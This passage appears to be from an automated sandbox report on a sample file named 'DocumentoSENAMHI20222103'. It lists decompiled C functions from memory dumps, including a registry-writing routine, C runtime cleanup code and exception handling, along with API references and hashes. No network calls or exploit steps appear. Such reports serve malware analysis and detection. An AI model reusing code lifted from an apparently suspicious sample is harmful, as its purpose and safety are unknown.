											__eflags = _t179;
											_t100 = _t179;
										} else {
											_t147 = E001574D0( &_v4120);
											_v4380 = 0;
											_v8 = 0;
											_t23 = _t147 + 2; // 0x2
											_v8 = 1;
											__eflags = E00153D42(_t23) - 0x100;
											if(__eflags <= 0) {
												_t226 =  &_v4376;
												_v4380 = _t226;
											} else {
												E00153D1D( &_v4380, _t220, __eflags, _t148);
												_t226 = _v4380;
											}
											__eflags = _t226;
											if(_t226 == 0) {
												_push(0xe);
												goto L28;
											} else {
												__eflags = _v4120;
												_t217 =  &_v4120;
												if(_v4120 != 0) {
													do {
														_t155 = CharNextA(_t217);
														_t201 =  *_t217;
														__eflags = _t201 - 0x5c;
														if(_t201 != 0x5c) {
															L17:
															 *_t226 = _t201;
															_t157 = IsDBCSLeadByte( *_t217 & 0x000000ff);
															__eflags = _t157;
															if(_t157 == 0) {
																L20:
																_t217 =  &(_t217[1]);
																__eflags = _t217;
																goto L21;
															} else {
																_t226 =  &(_t226[1]);
																_t217 =  &(_t217[1]);
																_t158 =  *_t217;
																__eflags = _t158;
																if(_t158 != 0) {
																	 *_t226 = _t158;
																	goto L20;
																}
															}
														} else {
															__eflags =  *_t155 - 0x30;
															if( *_t155 != 0x30) {
																goto L17;
															} else {
																 *_t226 = _t162;
																_t217 = CharNextA(_t155);
																goto L21;
															}
														}
														goto L22;
														L21:
														_t226 =  &(_t226[1]);
														__eflags =  *_t217;
													} while ( *_t217 != 0);
												}
												L22:
												 *_t226 = 0;
												_t226 = _v4380;
												__eflags = _t226;
												if(_t226 != 0) {
													_t218 = _t162;
													_t166 = _t226;
													do {
														_t152 = E001574D0(_t166) + 1;
														_t166 =  &(_t166[_t152]);
														_t218 = _t218 + _t152;
														__eflags = _t152 - 1;
													} while (_t152 != 1);
													_t154 = RegSetValueExA( *_v4400, _v4396, 0, 7, _t226, _t218);
													_t226 = _v4380;
													_t164 = _t154;
												} else {
													_push(0xd);
													L28:
													_pop(_t164);
												}
											}
											__eflags = _t226 -  &_v4376;
											if(_t226 !=  &_v4376) {
												E00153D14( &_v4380);
											}
											L62:
											__eflags = _t164;
											if(_t164 == 0) {
												goto L64;
											} else {
												_t100 = E001512D7(_t164);
											}
										}
									}
								}
							}
						}
					} else {
						_t100 = 0x80020009;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t209);
				_pop(_t221);
				_pop(_t163);
				return E0015403C(_t100, _t163, _v24 ^ _t227, _t203, _t209, _t221);
			}

0x00152443
0x00152445
0x00152450
0x00152451
0x00152457
0x0015245c
0x00152461
0x00152463
0x00152469
0x0015246d
0x00152473
0x00152476
0x0015247f
0x00152481
0x00152484
0x00152487
0x00152494
0x0015249a
0x001524a0
0x001524a6
0x001524b3
0x001524b9
0x001524cc
0x001524de
0x001524f0
0x001524f5
0x001524f7
0x00152504
0x00152504
0x00152507
0x001528b9
0x001528b9
0x001528ce
0x00000000
0x0015250d
0x0015250d
0x0015250d
0x00152510
0x0015277f
0x00152784
0x0015278b
0x0015278d
0x00152806
0x00152806
0x0015278f
0x0015278f
0x00152792
0x0015279a
0x0015279c
0x001527a2
0x001527ab
0x001527b4
0x001527b9
0x001527c9
0x001527cf
0x001527bb
0x001527c2
0x001527f1
0x001527f1
0x001527f7
0x001527f9
0x00152813
0x0015281b
0x00152821
0x00152828
0x0015282a
0x0015282c
0x00152832
0x00152843
0x00152850
0x0015285b
0x0015285e
0x0015285f
0x00152865
0x00152865
0x00152869
0x0015286f
0x0015286f
0x0015286f
0x0015288f
0x00152897
0x0015289d
0x001528a5
0x001528a5
0x00000000
0x001527fb
0x00152801
0x00000000
0x00152801
0x001527f9
0x00152516
0x00152517
0x00152517
0x0015251a
0x00152650
0x00152652
0x0015265e
0x0015266b
0x00152672
0x00152674
0x0015267a
0x0015267f
0x00152682
0x00152684
0x001526e8
0x001526e8
0x00152686
0x00152686
0x0015268c
0x00152692
0x001526ad
0x001526b4
0x001526b9
0x00152694
0x00152696
0x0015269b
0x0015269d
0x00000000
0x0015269f
0x001526a1
0x001526a6
0x001526a9
0x001526a9
0x0015269d
0x001526c3
0x001526cc
0x001526d1
0x001526d3
0x001526fc
0x00152702
0x00152708
0x0015270a
0x00152736
0x0015275a
0x0015275c
0x0015275e
0x00152764
0x00152764
0x00152767
0x00152769
0x0015276f
0x0015276f
0x00152773
0x00000000
0x0015270c
0x0015270c
0x0015270e
0x00152714
0x00152714
0x00152717
0x00152719
0x0015271f
0x0015271f
0x00152723
0x00152723
0x0015270e
0x001526d5
0x001526d5
0x001526d7
0x001526d9
0x001526d9
0x001526dc
0x001526de
0x001526e4
0x001526e4
0x001526d9
0x00000000
0x001526d7
0x001526d3
0x00152520
0x00152520
0x00152525
0x001528dd
0x001528e9
0x001528f0
0x001528f2
0x001528f2
0x001528f5
0x0015252b
0x00152532
0x00152538
0x0015253e
0x00152541
0x00152544
0x0015254d
0x00152552
0x00152562
0x00152568
0x00152554
0x0015255b
0x00152584
0x00152584
0x0015258a
0x0015258c
0x0015262f
0x00000000
0x00152592
0x00152592
0x00152599
0x0015259f
0x001525a1
0x001525a2
0x001525a8
0x001525aa
0x001525ad
0x001525c1
0x001525c1
0x001525c7
0x001525cd
0x001525cf
0x001525db
0x001525db
0x001525db
0x00000000
0x001525d1
0x001525d1
0x001525d2
0x001525d3
0x001525d5
0x001525d7
0x001525d9
0x00000000
0x001525d9
0x001525d7
0x001525af
0x001525af
0x001525b2
0x00000000
0x001525b4
0x001525b5
0x001525bd
0x00000000
0x001525bd
0x001525b2
0x00000000
0x001525dc
0x001525dc
0x001525dd
0x001525dd
0x001525a1
0x001525e2
0x001525e2
0x001525e7
0x001525ed
0x001525ef
0x001525f5
0x001525f7
0x001525f9
0x001525ff
0x00152600
0x00152602
0x00152605
0x00152605
0x0015261f
0x00152625
0x0015262b
0x001525f1
0x001525f1
0x00152631
0x00152631
0x00152631
0x001525ef
0x00152638
0x0015263a
0x00152646
0x00152646
0x001528d0
0x001528d0
0x001528d2
0x00000000
0x001528d4
0x001528d6
0x001528d6
0x001528d2
0x00152525
0x0015251a
0x00152510
0x00152507
0x001524ce
0x001524ce
0x001524ce
0x001524cc
0x00152900
0x00152908
0x00152909
0x0015290a
0x00152916

APIs

Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5

Part of subcall function 001521F6: lstrcmpiA.KERNEL32(?,00165EBC,?,00000000,00000000,001524CA,?,26A91022,?,00000000,?,?,?,0016088D,000000FF), ref: 00152209

_strlen.LIBCMT ref: 00152532
CharNextA.USER32(00000000,?,?,26A91022,?,00000000,?,?,?,0016088D,000000FF,?,00153194,?,00000000,?), ref: 001525A2
CharNextA.USER32(00000000,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 001525B7

Strings

Vv0Xv@hv, xrefs: 001525C7
@\Dt, xrefs: 001526FC

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CharNext$_strlenlstrcmpi
String ID: Vv0Xv@hv$@\Dt
API String ID: 214070177-716746901
Opcode ID: a0a234c671d859ffc37e569b562ad32f16b76711fa6cca677b307728dd298745
Instruction ID: 7b228cfca39cdb1f2f74b43656ed39546c8870975ed58b16decd4d888130b3f2
Opcode Fuzzy Hash: a0a234c671d859ffc37e569b562ad32f16b76711fa6cca677b307728dd298745
Instruction Fuzzy Hash: 01D1B572D00268EBDB29CB64CC41AE9B7B4AF1A311F1440D9EF65AB250D7749EC9CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0015BFF1 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0015BFF1(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1696e8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00158B82(_t46);
							E0015BBAA( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00158B82(_t47);
							E0015BCA8( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00158B82( *((intOrPtr*)(_t74 + 0x7c)));
						E00158B82( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00158B82( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00158B82( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00158B82( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00158B82( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0015C162( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1691c0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00158B82(_t31);
							E00158B82( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00158B82(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00158B82(_t74);
			}

0x0015bff9
0x0015bffd
0x0015c005
0x0015c00e
0x0015c013
0x0015c01a
0x0015c022
0x0015c02a
0x0015c035
0x0015c03b
0x0015c03c
0x0015c044
0x0015c04c
0x0015c057
0x0015c05d
0x0015c061
0x0015c06c
0x0015c072
0x0015c013
0x0015c073
0x0015c07b
0x0015c08e
0x0015c0a1
0x0015c0af
0x0015c0ba
0x0015c0bf
0x0015c0c8
0x0015c0d0
0x0015c0d1
0x0015c0d7
0x0015c0da
0x0015c0dd
0x0015c0e4
0x0015c0e6
0x0015c0ea
0x0015c0f2
0x0015c0f9
0x0015c0ff
0x0015c100
0x0015c100
0x0015c107
0x0015c109
0x0015c10e
0x0015c116
0x0015c11b
0x0015c11c
0x0015c11c
0x0015c11f
0x0015c122
0x0015c125
0x0015c128
0x0015c128
0x0015c138

APIs

___free_lconv_mon.LIBCMT ref: 0015C035

Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBC7
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBD9
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBEB
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBFD
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC0F
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC21
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC33
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC45
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC57
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC69
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC7B
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC8D
Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC9F

_free.LIBCMT ref: 0015C02A

Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA

_free.LIBCMT ref: 0015C04C
_free.LIBCMT ref: 0015C061
_free.LIBCMT ref: 0015C06C
_free.LIBCMT ref: 0015C08E
_free.LIBCMT ref: 0015C0A1
_free.LIBCMT ref: 0015C0AF
_free.LIBCMT ref: 0015C0BA
_free.LIBCMT ref: 0015C0F2
_free.LIBCMT ref: 0015C0F9
_free.LIBCMT ref: 0015C116
_free.LIBCMT ref: 0015C12E

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2504d3c439d847d7913334c6edc24774746da53eb48b8e4860e00ff00c7de0d1
Instruction ID: 27ad447e3fe5a498065ed2749981a60c303e2ddcc01c59a2f0c0b403a3e44a31
Opcode Fuzzy Hash: 2504d3c439d847d7913334c6edc24774746da53eb48b8e4860e00ff00c7de0d1
Instruction Fuzzy Hash: E8314A71604700DFEB20AE38D845B5673E9EF50362F148519F865EF192DF75AD88CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00158F8C Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00158F8C(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x162040;
				if(_t68 != 0x162040) {
					E00158B82(_t68);
					_t36 = _a4;
				}
				E00158B82( *((intOrPtr*)(_t36 + 0x3c)));
				E00158B82( *((intOrPtr*)(_a4 + 0x30)));
				E00158B82( *((intOrPtr*)(_a4 + 0x34)));
				E00158B82( *((intOrPtr*)(_a4 + 0x38)));
				E00158B82( *((intOrPtr*)(_a4 + 0x28)));
				E00158B82( *((intOrPtr*)(_a4 + 0x2c)));
				E00158B82( *((intOrPtr*)(_a4 + 0x40)));
				E00158B82( *((intOrPtr*)(_a4 + 0x44)));
				E00158B82( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00158DB8(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00158E23(_t67, _t72, _t73, _t77);
			}

0x00158f8c
0x00158f8c
0x00158f8c
0x00158f91
0x00158f97
0x00158f99
0x00158f9f
0x00158fa2
0x00158fa7
0x00158faa
0x00158fae
0x00158fb9
0x00158fc4
0x00158fcf
0x00158fda
0x00158fe5
0x00158ff0
0x00158ffb
0x00159009
0x00159014
0x0015901c
0x0015901d
0x00159020
0x00159026
0x0015902a
0x0015902e
0x0015902f
0x00159039
0x0015903f
0x00159040
0x00159043
0x00159049
0x0015904d
0x00159051
0x00159058

APIs

_free.LIBCMT ref: 00158FA2

Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA

_free.LIBCMT ref: 00158FAE
_free.LIBCMT ref: 00158FB9
_free.LIBCMT ref: 00158FC4
_free.LIBCMT ref: 00158FCF
_free.LIBCMT ref: 00158FDA
_free.LIBCMT ref: 00158FE5
_free.LIBCMT ref: 00158FF0
_free.LIBCMT ref: 00158FFB
_free.LIBCMT ref: 00159009

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c8fe42b150a8257f8754f201f79aa91f5ef4a79730b180eb078497b54771df6
Instruction ID: c6a586d3597529c0adae4ff38c493be2193c40fe621b1bdcfc8d17de98603c84
Opcode Fuzzy Hash: 7c8fe42b150a8257f8754f201f79aa91f5ef4a79730b180eb078497b54771df6
Instruction Fuzzy Hash: 9B2162B6910108EFCB41EF94C881DDE7BB9FF18355F0441A6B965AF121DB31EA588F80

Uniqueness

Uniqueness Score: -1.00%

Function 00156111 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00156111(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E0015707A(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00158A26(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00155DCC(_t271, _t275, _t296, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00155DCC(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00154F23(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00154E56(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00156091(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00158A26(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00155DCC(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00155DCC(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E00155DCC(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00154E56(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
